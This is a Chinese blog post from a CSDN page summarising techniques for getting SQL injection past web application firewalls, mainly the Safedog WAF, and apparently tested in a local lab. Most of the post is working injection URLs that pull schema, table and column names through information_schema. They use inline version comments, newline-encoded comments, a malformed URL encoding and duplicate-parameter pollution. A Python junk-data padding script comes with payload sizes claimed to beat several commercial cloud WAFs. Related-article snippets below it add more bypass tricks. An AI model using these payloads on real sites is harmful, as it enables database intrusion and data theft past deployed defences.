sql注入绕waf总结

最新推荐文章于 2024-07-16 14:11:47 发布
最新推荐文章于 2024-07-16 14:11:47 发布
阅读量762 收藏 3
点赞数 1
分类专栏: 绕waf 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108956146
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

总结下自己常用的sql注入绕waf方法

一、环境搭建?

windows 10 操作系统
1,phpstudy2016
2,安全狗最新版,(切记以管理员身份启动安全狗)

二、方法

1.内联注释(/![12345]/)绕过方法:

/!select/: 相当于没有注释
/!12345select/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。
/![]/: []中括号中的数字若填写则必须是5位

例子:http://192.168.31.142/safedog/bihuo.php?tel=1' or -1/*!11544order/*!11544by/*!11544*/1--+


http://192.168.31.142/safedog/bihuo.php?tel=1' /*!11544union/*!11544select/*!115441,2,3,4,group_concat(schema_name),6*/from information_schema.schemata--+

http://192.168.31.142/safedog/bihuo.php?tel=1' /*!11544union /*!11544select/*!115441,2,3,4,/*!11544group_concat(/*!11544table_name),6/*!11544from/*!11544information_schema.tables/*!11544where/*!11544table_schema=/*!11544database/*!11544()*/--+
http://192.168.31.142/safedog/bihuo.php?tel=1' /*!11544union /*!11544select/*!115441,2,3,4,/*!11544group_concat(/*!11544table_name),6/*!11544from/*!11544information_schema.tables/*!11544where/*!11544table_schema=/*!11544database/*!11544()*/--+

2.第二种绕过方法,内联注释另类思想绕过

传统的方法使用内联注释都是使用 /!12345select/ 去注释SQL关键字符来进行绕waf,那么为什么非得注释关键字呢,她是美女么?有我们必火的小女生好看吗? 如果不是美女,也没我们的小女生好看,那能不能不注释关键字,注释点别的好不好?

代码如下(示例):

http://192.168.31.142/safedog/bihuo.php?tel=1'union/*!88888www.hacker.wang*/
select 1,2,3,4,  group_concat(column_name),6 from information_schema.columns where table_schema=database () and 
/*!88888www.hacker.wang*/table_name=0x7573657273 --+

解析:
图中两处 /!88888www.hacker.wang/ 即可绕狗 :88888 肯定大于当前啊版本号,所以注释内容不执行,等于没有加这句话,不影响程序运行。
下面的表名要换成16进制。
注意database()中间有个空格

3.第三种绕过方法,%0a绕过

示例:

http://192.168.31.142/safedog/bihuo.php?tel=1' 
union -- www.hacker.wang%0aselect 1, 2,3,4, group_concat(column_name),6 
from information_schema.columns where table_schema=database () and  
-- www.hacker.wang%0a table_name=0x7573657273--+

解析:
–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,
database空格()这里,中间有个空格

4.第四种绕过方法,特殊的URL编码绕过安全狗

示例:

http://192.168.31.142/safedog/bihuo.php?tel=1' union/*%!a*/select 1,2,3,4, 
 group_concat(column_name),6 from information_schema.columns 
 where table_schema=database () and table_name in (0x7573657273) --+

解析:
此处%!a是一个错误的url编码,但这个编码比较特殊,可以绕狗,其他则不行。
这里的table_name 要 改成 table_name in (0x7573657273) 这种格式
database() 中间有个空格 database空格()

5.url另类传参绕过

示例:

http://192.168.31.142/safedog/bihuo.php?tel=1&bihuo=/*&tel=1'union select 1,2,3,4, 
group_concat(column_name),6 from information_schema.columns 
where table_schema=database() and table_name='users' --+*

当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/,后面/闭合:
绕过分析:安全狗误以为/**/是注释的内容所以全部忽略。

6.垃圾数据填充

用脚本生成的垃圾数据进行填充绕过:

#coding=utf-8
import random,string
from urllib import parse
varname_min = 5
varname_max = 15
data_min = 20
data_max = 25
num_min = 50
num_max = 100
def randstr(length):
    str_list = [random.choice(string.ascii_letters) for i in range(length)]
    random_str = ''.join(str_list)
    return random_str

def main():
    data={}
    for i in range(num_min,num_max):
        data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))
    print('&'+parse.urlencode(data)+'&')

main()

生成垃圾数据 当如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。
目前为止的bypass测试数据:

云锁:30KB

宝塔:30KB

阿里云:200+键值对

qq_45746681
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
SQL注入waf
beaulo的博客
09-15 184
SQL注入waf总结笔记0x01 注释过0x02 过and、or0x03 过空格、注释、and、or0x04 过空格的方法0x05 过引号0x06hex编码waf0x07 无法使用infomation_schema的布尔盲注0x08 过=、空格、and、or、逗号 0x01 注释过 ?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1 0x02 过and、or ?id=1'||extractva
SQL注入过安全狗的waf防火墙,这一篇就够了,8k文案超详细
最新发布
xt350488的博客
07-16 1309
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
SQL注入WAF
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF过的基本方法 WAFWAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
sql注入waf
weixin_43271438的博客
10-01 1561
大小写混合 union SelEct 多重关键字 Ununionion selselectect 编码 类型:十六进制、URL、Unicode 形式:0x626264218e、%20、%u0020 注释 – # 等价函数或命令 union:用于合并两个或多个 SELECT 语句的结果集,并消去表中任何重复行。 union distinct:同union union all:用于合并两个或多个 ...
SQL注入篇——WAf
爱国小白帽
02-11 1675
WAF是什么? Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 Waf分类 代码WAF 软件WAF 硬件WAFWAF Sql注入waf常用方式 大小写混合 uNIoN sELecT 1,2,3,4 2...
sql注入过方法总结
12-19
sql注入过方法总结waf,D盾
深入了解SQL注入waf和过滤机制
02-11
"深入了解SQL注入waf和过滤机制" SQL 注入WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
SQL注入中的WAF过技术
08-19
SQL注入中的WAF过技术,里面的思路很好,可以学习一下
SQL注入WAF总结
aiguang4476的博客
06-07 483
0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御。 0x01 环境搭建 360主机卫士官网:http://zhuji.360.c...
SQL注入WAF过注入
weixin_54105551的博客
07-03 2569
本文主要讲的是如何WAF的基础知识,写的不好,请多多见谅。
sql注入waf
YouthBelief的博客
10-13 2720
sql注入waf 安全狗3.5 1.内联注释+5五位数+%23+%0a 过 ?id=1 union select 1,2,3; 会被拦截 经过测验 union select 函数被拦截 构造 /*!06447%23%0a*/select 即可过 安全狗4.0 ?id=1 union select 1,2,3; 会被拦截 3.5版本过方法 失败 payload union /*!--+/*%0a select /*!1,2,*/3 分析 union /*! --+/*%0a
sql注入waf小Tips
Zlirving_的博客
07-04 723
因为对上次比赛sql的题挺不甘心 所以又着重复习了一遍sql,并记录了平常waf的点 手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性过 Mysql 前期详解:传送门 1.1、联合注入 0x01 and过 直接 and 1=1 直接就会被拦截 在数值的前面加特殊符号干扰匹配规则进行过 在这里使用取反符号’-‘或者取逻辑位非运算符号’~'进行过 and = && or = || %26 == & 0x02 对order by ——> 判断表的字段
WAF过方法从简单到高级
weixin_33711647的博客
05-10 244
WAF介绍什么是WAF?Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。基本/简单过方法:1、注释符http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….2、使用大小写http://www.site.com/index.php...
SQL注入WAF过技巧
永远是少年
08-11 2776
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入WAF过技巧。 一、数据层面WAF 二、方式层面WAF 三、其他方式WAF 四、写在最后
SQL注入WAF
weixin_42581003的博客
01-14 540
SQL注入WAF的方法有很多种,其中一些常见的方法包括: 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 使用多语句查询来WAF,例如将“;”替换为“%3b”。 使用不常见的SQL关键字来WAF,例如使用“version()”代替“@@version”。 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 使用已知的WAF过技巧来WAF,...
WAF过之SQL注入
Williamanddog的博客
02-05 412
内联注释:是MySQL为了保持与其他数据兼容,将MySQL中特有的语句放在/!后面的过程就不再赘述,总结就是通过内联注释,换行,等价函数的使用,还有添加空格或者特殊字符的方式来进行过。利用下列语句过,在参数后插入其他语句,添加注释,然后使用截断,使用%23使得语句报错,将双。1' group by 3--+ 报错,则查询2列。尝试无防护手注,1' and '1'='1返回正常。regexp是正则匹配,%0A是换行,%23是#1' order by 1--+ 被拦截。1' and '1‘='1被拦截。
sql注入——waf
cxrpty的博客
02-11 566
Waf是Web应用防护系统,也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 sql注入waf常用方式有以下几种: 1.大小写混合 uNIoN sELecT 1,2,3,4 2.替换关键字 selselectect 1,2,3,4 3....
SQL注入WAF
m0_48907714的博客
04-04 3353
SQL注入WAF过 数据 大小写 加密解密 编码解码 等价函数 特殊符号 反序列化 注释符混用 方式 更改提交方式 变异 其他 Fuzz大法 数据库特性 垃圾数据溢出 HTTP参数污染
sql注入及其waf
06-07
SQL注入是指攻击者通过在Web应用程序的输入参数中插入恶意SQL语句,以执行未经授权的操作。攻击者可以利用SQL注入漏洞来窃取敏感数据,修改数据库中的数据或者执行其他恶意行为。为了防止SQL注入攻击,Web应用程序通常会使用一些安全措施,例如WAF(Web应用程序防火墙)。 WAF是一个位于Web应用程序和互联网之间的设备或软件,用于监视和过滤Web应用程序的输入和输出流量,以保护Web应用程序免受各种攻击。WAF通常使用正则表达式等技术来检测恶意输入,并拦截可疑请求。然而,攻击者可以使用一些技术来WAF,例如使用编码、分段、多个请求等方式来WAF的检测。 为了防止SQL注入攻击和WAF过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的WAF,并配置正确的规则集。 5. 定期对Web应用程序进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值